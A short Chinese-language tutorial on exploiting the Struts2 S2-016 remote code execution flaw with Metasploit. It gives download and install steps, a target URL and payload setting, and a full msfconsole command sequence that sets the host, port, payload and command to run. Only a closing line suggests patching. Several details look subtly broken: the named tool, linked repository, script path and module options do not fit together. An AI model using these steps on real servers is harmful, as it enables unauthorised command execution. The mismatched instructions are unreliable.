Struts2 远程执行代码(S2-016) 利用工具
S2-016是Struts2的一个远程代码执行漏洞,攻击者通过该漏洞可以远程执行自己的恶意代码,从而危害服务器安全。本文将介绍S2-016利用工具的使用方法。
1.下载工具
S2-016的利用工具有很多,比如Metasploit和S2-016-Exploit 。这里我们以S2-016-Exploit为例进行介绍。可以在GitHub上进行下载:https://github.com/rapid7/metasploit-framework
2.安装工具
下载完成后,解压源代码,进入到解压后的文件夹,然后运行以下命令以安装依赖项:
bundle install
3.配置工具
打开exploits/S2-016目录下的s2-016.rb文件,将target_url和payload设置为目标服务器的URL和执行的payload,如下所示:
target_url = "http://example.com/struts2-showcase/index.action"
payload = "ping -c 3 127.0.0.1"
其中,target_url为目标服务器Struts2的漏洞URL地址,payload为将要执行的命令。
4.运行工具
运行以下命令以执行利用工具:
msfconsole
use exploit/multi/http/struts2_s016
set URIPATH struts2-showcase
set TARGETURI /struts2-showcase
set RHOST example.com
set RPORT 80
set PAYLOAD linux/x86/exec
set CMD "ping -c 3 127.0.0.1"
set VHOST example.com
run
其中,set URIPATH、set TARGETURI、set RHOST、set RPORT、set PAYLOAD、set CMD和set VHOST需要根据具体情况进行修改,最后运行run命令即可触发漏洞利用。
总结
S2-016是一个较为严重的漏洞,攻击者可以通过此漏洞远程执行恶意代码,危害服务器安全。因此,建议管理员及时升级修补,避免被攻击者利用漏洞对服务器进行攻击。
